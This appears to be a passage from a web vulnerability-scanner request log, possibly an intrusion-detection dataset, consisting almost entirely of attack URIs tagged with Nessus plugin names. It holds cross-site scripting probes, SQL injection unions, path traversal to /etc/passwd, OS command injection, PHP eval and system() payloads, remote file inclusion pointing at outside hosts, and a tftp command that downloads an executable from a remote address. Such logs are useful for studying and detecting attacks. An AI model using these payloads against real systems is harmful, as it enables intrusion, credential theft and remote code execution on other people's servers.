http-equiv=set-cookie content=\"testyglc=8988\">\n/scripts/gdxlwjnlsr6i.php3\n/eei78ore.cgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/index.php?page=/etc/passwd\\x00\n/5qnlm5z2.dll?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/fcgi-bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/scripts/kfzqb5x87lvq.php3\n/b4vng02k.asp?<script>document.cookie=\"testtrlh=3672;\"</script>\n/scripts/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/scripts/test11.asp\n/main.php?stuff=\"\\x0adel\\x09q74494385\\x09#\n/?<script>document.cookie=\"testwldz=3506;\"</script>\n/en-us/account/index.php?id='\n/cgi-915/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/phpmyadmin/htsearch?exclude=`/etc/passwd`\n/fc9t54l7.jsp?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/examples/jsp/jsp2/jspx/starnet/addons/slideshow_full.php?album_name='2005084173\n/javascript/benefits.exe\n/hrttz9fj.exe?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/top.php?stuff=&ver\\xa0>q92247843&rem\\xa0\n/scripts/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/h21y8w52.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\nftp://192.168.24.253/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/l752x1ry.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/search.jsp?q=%\"<script>alert(1331909235)</script>\n/www/delivery/ac.php?bannerid=-1332009302+or+1=1+--+';passthru(base64_decode($_server[http_nessus_dllvu4k6]));die;/*\n/en-us/account/index.php?id='union/**/select/**/0,0,1647791366,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/examples/servlets/servlet/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/help.php?q='sleep 8 #\n/iktok2bw.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/~ftp.exe\n/sprotectlinux/showpage.cgi?page=../html/splx_main.htm\n/help.php?q=\"&ping -w 8000 -n 1 1.2.3.4&rem \n/emailfriend/emailarticle.php?id=\\\"<script>alert(document.cookie)</script>\n/javascript/document.bat\n/static//\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xaeetc/passwd\n/6dlc2zm9.do?<script>document.cookie=\"testqpux=4016;\"</script>\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331919174')</script>\n/ju0u7kfo.jsp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6~\n<script>document.cookie=\"testjvvf=7721;\"</script>\n/egaet53a.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=ver;>q99348313&rem;\n/recordings/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/examples/jsp/error/pfdispaly.cgi?../../../../../../etc/passwd\n/bin/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/ewc3rz1l.idc?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/en-us/dda2qr7j.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/m4kkjf8l.asp?<script>document.cookie=\"testyglc=8988;\"</script>\n/mpcgi/ion-p?page=../../../../../etc/passwd\n/examples/jsp/checkbox/index.php?cat='\n/h4bi26jd.aspx?<script>document.cookie=\"testhrzx=1150;\"</script>\n/examples/jsp/colors/add_url.htm?node=<script>alert('xss')</script>\n/subscriptions.jpg\n/t578vqea.htm?<script>document.cookie=\"testsory=7676;\"</script>\n/examples/jsp/error/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/javascript/htpasswd.py\n/scripts/index.php?board=nonexistant674192050\n/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/top.php?stuff=ver\\x0b>q75783184&rem\\x0b\n/scripts/9pen4xzgztjn.sh\n/examples/jsp/checkbox/index.php?id=0rop9yeuxw'\n/examples/jsp/jsp2/jspx/al_initialize.php?alpath=/etc/passwd\\x00\n/d5a5renl.kspx?<script>cross_site_scripting.nasl</script>\n/y8pmygrp.htm?<script>cross_site_scripting.nasl</script>\n/javascript/pubs.exe\n/help.php?q=\"&rm\\x09q57946156\\x09#\n/en-us/hipkz026.php?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/scripts/1hactwocbsuo.cfm\n/main.php?logout=\\x0auname\\x09>q18697999\\x09#\n/scripts/servubrowse.asp\n/javascript/submit.exe\n/help.php?q=\"ver\\x09>q14739543&rem\\x09\n/cgis/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/p043snfr.php3?<script>cross_site_scripting.nasl</script>\n/scripts/vzdybnanqpc3.php\n/i686v90l.cfc?<script>document.cookie=\"testfutf=1550;\"</script>\n//../../../../../../../../etc/passwd\\x00\n/cgis/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/hrttz9fj.fts?<script>document.cookie=\"testtbjy=7334;\"</script>\n/cgi-bin/showproduct.php?product=1'\n/bb000001.pl<script>alert('vulnerable')</script>\n/examples/jsp/jsp2/jspx/config.php?returnpath=/etc/passwd\\x00\n/i7prbs22.cgi?<script>document.cookie=\"testjnre=7328;\"</script>\n/cacti/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/help.php?q='\\x0auname\\x09>q12762848\\x09#\n/cacti/cal_week.php?op=week&catview=999'\n/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\nmessagedetail.asp?msg_id='\n/um7xpn15.mscgi?<script>document.cookie=\"testotoy=6142;\"</script>\n/main.php?logout=\"|ping -w 9000 -n 1 4.3.2.1|rem \n/scripts/zq9frlz6fcfp.php\n/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/0z575z74.htm?<script>document.cookie=\"testuhsv=9753;\"</script>\n/recordings/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/cgi-bin/guestbook/passwd\n/8x6w469u.kspx?<script>document.cookie=\"testgfjr=1286;\"</script>\n/kerkhoffs'_law/\n/javascript/document.msg\n/i686v90l.kspx?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/javascript/replicated.exe\n/3j8echh0.html?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/examples/servlets/servlet/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/scripts/zq9frlz6fcfp.cfm\n/cacti/calendar.php?serverpath=/etc/passwd\\x00\n/cgibin/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/main.php?stuff=\"ver\\xa0>q63696925&rem\\xa0\n/phpnuke/html/.php?name=network_tools&file=index&func=ping_host&hinput=;id\n/recordings/shoutbox.php?conf=../\n/demos/demo.browse.php?filename=/etc/passwd\n/<script>document.cookie=\"testvowq=604;\"</script>\n/fpnpp5zg.pl?<meta http-equiv=set-cookie content=\"testyias=101\">\n/scripts/weigh_keywords.php?etcdir=http://cirt.net/rfiinc.txt?\n/j4rdyhw8.php?<script>document.cookie=\"testrluj=1420;\"</script>\n/help.php?q=\";uname >q49727674 #\n/main.php?logout=/'\n/main.php<?eval($_post['q54461335']);?eval($_post['q54461335']);?>\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 412834017--\n/s7qus4g3.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script_saved/\n/comments.php?scriptpath=http://192.168.202.96:8080/frznctvhi0i5??\n/index.php?page=../../../../../../../../../../../../../../../../../winnt/system32/ipconfig.exe\n/m2fpztty.pl?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/index.php?string='\n/tuwjta1w.htm?<script>document.cookie=\"testpokn=7494;\"</script>\n/cleartrust/ct_logon.asp?ctauthmode=basic&ctloginerrormsg=xx&ct_orig_uri=\\\">< script>alert(1)/script><\\\"\n/cgi-915/ppdscgi.exe\n/main.php?logout=\"ping;-w;10000;-n;1;4.3.2.1&rem;\n/javascript/nude.exe\n/y8pmygrp.do?<script>cross_site_scripting.nasl</script>\n/scripts/counter.exe\n/vac1l5vm.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ybz5rz7a.php?<script>document.cookie=\"testsbvw=6289;\"</script>\n/examples/jsp/jsp2/jspx/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/javascript/htpasswd.rhtml\n/ju0u7kfo.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/misc/audio.php?recording=../version.inc\n/grid_subscriptions2/\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=lnu3g9zkqrlule9mw\n/examples/jsp/colors/hw3.cgi?daysonly=0).system('id').(\n/eei78ore.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n../../../../../../../../../../../../etc/passwd\n/<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/javascript/hp.exe\n/qhvu0pdg.php?<script>document.cookie=\"testchuc=2100;\"</script>\n/cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/main.php?logout=';uname >q89385457 #\n/scripts/ggvfa_wichxq.asp\n/eei78ore.php?<script>cross_site_scripting.nasl</script>\n/javascript/.passwd.dll\n/src/scripture.php?pageheaderfile=@rfiurl?pageheaderfile=@rfiurl?\n/securecgi-bin/csusercgi.exe?help+00.abcd.e.fghijk\"\"\"><script>alert(\"\"\"xss\"\"\")</script>\n/index.php?config[\"sipssys\"]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/javascript/pc.exe\nhttp://xxxxxxxxxxx.:80/<script>alert('vulnerable')</script>.cfm\n<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/cgi-perl/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/nsn/..\\util/ren.bas\n/examples/servlets/servlet/faxsurvey?cat /etc/passwd\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/fetpkvinrp.sh+>+/dev/null+&').\"]=1\n/en-us/jnv890lt.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/save.php?file_save=/etc/passwd\n/phpmyadmin/notify?from=nessus\"|id\"\n/examples/jsp/error/index.php?op=default&date=200607' union select 1,1200541698,1,1,1,1,1,1,1,1--&blogid=1\n/help.php?q=\"ping;-w;11000;-n;1;4.3.2.1&rem;\n/scripts/zdbyw3dn3gh2.html\n/q703m78q.kspx?<script>document.cookie=\"testvowq=604;\"</script>\n/main.php?stuff=\"&ver;>q22147997&rem;\n/help.php?q=\"|ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/script/tick/allincludefortick.php?path_to_code=http://192.168.202.118:8080/zz5thkvtmlgl?\n/v3axg1p8.cfm?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/p043snfr.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"|ping;-w;11000;-n;1;1.2.3.4|rem;\n/javascript/stored.exe\n/launch.asp?nfuse_application=<script>alert('vulnerable')</script>\n/cacti/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/p043snfr.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xfkun1ku.htm?<script>cross_site_scripting.nasl</script>\n/ghswfouu.cfm?<script>document.cookie=\"testsqmm=5713;\"</script>\n/top.php?stuff=\"rm\\x09q12423295&rem\\x09\n/main.php?stuff=&uname >q17531529 #\n/h5sc3gxy.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/reference.exe\n/interface/login/login_frame.php?site=\"><!--#exec cmd=\"dir \\\"--><\n/scripts/vzdybnanqpc3.asp\n/main.php?stuff=\"&sleep\\x099\\x09#\n/en-us/oie504mr.php3?<script>document.cookie=\"testtpby=7052;\"</script>\n/scripts/k0pxpjgnimox.cfm\n/de3v2dd9.aspx?<script>cross_site_scripting.nasl</script>\n<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/x7pclv4s.kspx?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/scripts/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/fnwhrxyd.htm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>\n/examples/servlets/servlet/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/bxnyrhmh.aspx?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/scripts/misc/info.php\n/ybz5rz7a.html?<script>document.cookie=\"testsbvw=6289;\"</script>\n<script>document.cookie=\"testbnli=1975;\"</script>\n/help.php?q=\"&ping\\x09-w\\x098000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/main.php?stuff=\"rm q23955852 #\n/scripts/ubbthreads.php\n/azcrfs8d.jspa?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/examples/servlets/servlet/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/b5xdqgz2.cgi?<script>cross_site_scripting.nasl</script>\n/169okeyj.mscgi?<script>document.cookie=\"testxeoi=3573;\"</script>\n/scripts/axdgpyi2bn6f.php\n/scripts/msmmask.exe?mask=/nessus312940811.asp\n/recordings/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/checkbox/index.php?templates_dir=/etc/passwd\\x00\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332010394')</script>\n/javascript/message.exe\n/scripts/d3z7yywpyeoa.pl\n/top.php?stuff=\"&ver&rem \n/examples/servlets/servlet/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/javascript/solved.exe\n/index.php?action=search&searchfor=\\\"><script>alert('vulnerable')</script >\n/main.php?stuff=\"&ver;>q86839174&rem;\n/oie504mr.nsf?<script>document.cookie=\"testtpby=7052;\"</script>\n/nyvbv05h.cgi?<script>document.cookie=\"testftxz=5980;\"</script>\n/javascript/dbmodules.exe\n/mail.php?id='/**/union/**/select/**/1,2,1331919224,4--&blog=1\n/examples/jsp/cal/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/fpnpp5zg.asp?<script>document.cookie=\"testyias=101;\"</script>\nftp://192.168.28.202/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/raanw4ia.mscgi?<script>cross_site_scripting.nasl</script>\n/cgibin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/scripts/k0pxpjgnimox.shtml\n/h5i6crm3.mscgi?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/hipkz026.php?<script>document.cookie=\"testyrbs=2855;\"</script>\n/6n7aacgg.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/demos/demo.browse.php?filename=/etc/passwd\n/jnt3f86c.htm?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/help.php?q=uname\\x09>q77267797\\x09#\n/bin/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/javascript/ppt.exe\n/dda2qr7j.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/j2kdmfw4.cfc?<script>cross_site_scripting.nasl</script>\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331918993',null,null,null,null --\n/examples/jsp/jsp2/jspx/index.php?user_langue=../../../../../../../../../../etc/passwd\n/0rufe52p.php3?<script>cross_site_scripting.nasl</script>\n/static//..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd\n/cgi-915/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/main.php?stuff=\"ping,-w,9000,-n,1,4.3.2.1&rem,\n/_vti_bin/shtml.exe\n/help.php?q=\"rm\\x0cq43711515&rem\\x0c\n/main.php?stuff=\";rm\\x09q18442351\\x09#\n/cgi-bin/..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/main.php?stuff=\"ping -w 10000 -n 1 4.3.2.1&rem \n/nuh3zirz.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/o6ebbirj.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/viewcvs.cgi/?cvsroot=<script>foo</script>\n/javascript/~log.exe\n/cgi-bin/index.php?op=default&date=200607' union select 1,1192121872,1,1,1,1,1,1,1,1--&blogid=1\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904240','5'--\n/script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/phpmyadmin/documentation.html?'\"=1\n/index.php?cid='\n/cacti/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/examples/jsp/sessions/sawmill6cl.exe?ho+{complete_version}\n/apavxugx.jsp?<script>document.cookie=\"testdnbh=5237;\"</script>\n/javascript/pool.exe\n/examples/jsp/num/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/aj3pf49c.cfm?<script>document.cookie=\"testnofv=4170;\"</script>\n/main.php?logout=\"&ping,-w,11000,-n,1,4.3.2.1&rem,\n/imp/mailbox.php3?actionid=6&server=x&imapuser=x';somesql+--&pass=x\n/scripts/weigh_keywords.php?etcdir=http://192.168.202.96:8080/4dckqcc0acprbz?\n/9ko6m4c8.php3?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/scripts/index.php?id='union/**/select/**/0,0,521532225,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/top.php?stuff=\"&del q85387982 #\n/javascript/.passwd.csproj\n/javascript/catalogs.exe\n/jdx255ea.cfc?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/recordings/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/examples/jsp/num/popup.php?include_path=/etc/passwd\\x00\n/top.php?stuff=\"\\x0asleep\\x097\\x09#\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --\n/en-us/9kr0ih0v.asp?<script>document.cookie=\"testzgnm=1183;\"</script>\n/javascript/running.exe\n/cgi-bin/home/search.asp?nchannel='1\n/main.php?logout=\"del q21367835&rem \n/cgi-bin/..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/rv98iwjp.htm?<script>cross_site_scripting.nasl</script>\n/cgi-bin/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/phpmyadmin/documentation.html?phpmyadmin=/etc/passwd\n/examples/jsp/error/calendar_admin.pl?config=|cat /etc/passwd|\n/scripts/ck8pj.exe?/x+/c+tftp -i 192.168.202.118 get durjhxa1 qowmcdks.exe\n/phpmyadmin/documentation.html?phpmyadmin=|cat /etc/passwd|\n/main.php?logout='del\\x09q76232693\\x09#\n/examples/jsp/num/install.php?newlang=../../cpg_error.log\\x00\n/javascript/closing.exe\n/javascript/monitoring.exe\n/en-us/fo564rei.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/prescription010507/\n/if69ddo1.nsf?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/javascript/roaming.exe\n/6qbynt4f.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jnv890lt.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6qbynt4f.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/3hlysl2x.pl?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/main.php?logout=\"ping;-w;11000;-n;1;4.3.2.1&rem;\n/examples/jsp/cal/calendar_admin.pl?config=|cat /etc/passwd|\n/cgi-bin/search.jsp?q=%\"<script>alert(1332008604)</script>\n/rtph263dumpscript/\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=10nbpndw5e2ir1ncx\n/cgi-bin/mlog.html?screen=/etc/passwd\n/main.php?stuff=\"&ping\\x09-w\\x098000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/examples/jsp/jsp2/jspx/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/zroo33l4.php?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/top.php?stuff='\\x0asleep\\x097\\x09#\n/scs86g1p.cfc?<script>document.cookie=\"testquyx=2820;\"</script>\n/d5a5renl.html?<script>cross_site_scripting.nasl</script>\n/scripts/mapserv?map=mapserver_detect.nasl.map\n/javascript/corporate.exe\n/phpmyadmin/index.php?chemin=../../../../../../..//etc\n/syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>\n/ju0u7kfo.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/shoutbox/expanded.php?conf=../../../../../../../etc/passwd \n/help.php?q=\"rm\\x09q12928131\\x09#\n/en-us/account/more.php?id=1'\n/examples/servlets/servlet/forum_2.php?msg=10&return=<script>foo</script>\n/m2fpztty.idc?<script>cross_site_scripting.nasl</script>\n/l13b77e5.htm?<script>document.cookie=\"testjvvf=7721;\"</script>\n/javascript/.passwd.stackdump\n/examples/jsp/num/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/javascript/code.exe\n/manager/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/o1zj4u9v.asp?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/help.php?q='\\x0auname #\n/javascript/hit.exe\n/main.php?stuff=\"ping\\x09-w\\x0910000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/subscriptions.doc\n/include/scripts/run_auto_suspend.cron.php?dir=@rfiurl\n/nyjgaorz.kspx?<script>cross_site_scripting.nasl</script>\n<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/bugs/forgot_password.php?email=\\\"><script>alert(document.cookie)</script>\n/jnt3f86c.dll?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../vtigerservice.php\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/ukirnkmpbn\"\n/script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.96:8080/4dckqcc0acprbz??\n/cgi-914/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/main.php?stuff=&ver,>q61913742&rem,\n/3j8echh0.php?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/subscriptions.config\n/tlhhwkvs.exe/\n/javascript/auth.exe\n/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/urcppbumwm0;echo|awstats379091.txt\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\\x00\n/help.php?q=uname >q18373347 #\n/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/speech-transcript/\n/zv8tv7h8.do?<script>document.cookie=\"testcqwz=9752;\"</script>\n/t7tm4m0b.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/index.php?op=default&date=200607' union select 1,1128524552,1,1,1,1,1,1,1,1--&blogid=1\n/help.php?q='\\x0adel\\x09q47355772\\x09#\n/examples/jsp/sessions/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/m2fpztty.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/sawmillcl.exe?ho+{complete_version}\n/sscript/\n/cgi-bin/webplus?script=/../../../../etc/passwd\n/subscriptions.part\n/g8nu2yy7.jspa?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=';rm q26271527 #\n/scripts/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/7dbjwpw6.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgibin/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/top.php?stuff=\"ping -w 7000 -n 1 1.2.3.4&rem \n/cgi-bin/index.php?p='nessus\n/main.php?stuff=\"sleep 11 #\n/en-us/odzk29aa.nsf?<script>document.cookie=\"testtfvh=2141;\"</script>\n/scripts/prnnucptkixl.php\n/ju0u7kfo.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ydexw8by.x?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/main.php?logout=\"&uname >q45435148 #\n/cgi-win/ion-p?page=../../../../../etc/passwd\n/cgibin/gw5/gwweb.exe?help=bad-request\n/j4rdyhw8.fts?<script>document.cookie=\"testrluj=1420;\"</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/djjeroppey.sh'); function v\n/scripts/ylrvly9nh_pf.inc\n/scripts/index.php?op=default&date=200607' union select 1,1100287420,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/vhost.php?action=logout&time=1331908735\n/scripts/kfzqb5x87lvq.pl\n/newsletter_log.php?logfile=info.php&logtime=000060&email=<?php echo md5(\"test\"); ?>\n/ao22ww7y.do?<script>document.cookie=\"testqppc=8767;\"</script>\n/javascript/globals.exe\n/b5xdqgz2.exe?<script>cross_site_scripting.nasl</script>\n/jw64yq8u.x?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/scripts/gitweb.pl\n/main.php?logout='&del q16695623 #\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919202\n/uvazfs7p.pl?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/cgi-bin/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/examples/jsp/error/faq.php?action=&type=view&s=&id=-1' union select 0,157871866,0,0,0,0,0--\n/top.php?stuff='\\x0auname\\x09>q23871271\\x09#\n/manager/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/javascript/subscription.exe\n/ju0u7kfo.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/recordings/index.php?chemin=../../../../../../..//etc\n/en-us/account/home/search.asp?nchannel='1\n/javascript/_vti_cnf.exe\n/0qhcnefz.aspx?<script>cross_site_scripting.nasl</script>\n/ssxmagazinesubscription/\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.dll\n/examples/servlets/servlet/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/examples/jsp/checkbox/newsscript.pl?mode=admin\n/en-us/ddoworrl.asp?<script>document.cookie=\"testvlau=8517;\"</script>\n/javascript/resolution.exe\n/examples/jsp/jsp2/jspx/include/sql.php?include_path=/etc/passwd\\x00\n/scripts/vzdybnanqpc3.inc\n/\\x80../\\x80../\\x80../\\x80../\\x80../\\x80../winnt/win.ini\n/fcgi-bin/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/cgis/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/javascript/programs.exe\n/help.php?q=&uname\\x09>q82939622\\x09#\n/t3af3tdz.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.php?board=nonexistant1419816536\n/b5xdqgz2.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bn857frh.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/s7qus4g3.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scgi-bin/.htpasswd\n/phpmyadmin/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/en-us/account/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/recordings/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/dslpwt15.do?<script>document.cookie=\"testtkio=5454;\"</script>\n/mom's ass/\n/javascript/1994.exe\n/scripts/qg9h0c0svvat.sh\n/606wkcop.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/s7qus4g3.cfm?<script>cross_site_scripting.nasl</script>\n/vhzmaia2.cfm?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/javascript/htpasswd.pl\n/main.php?stuff=\"&ping,-w,11000,-n,1,1.2.3.4&rem,\n/i2n4v4rl.htm?<img 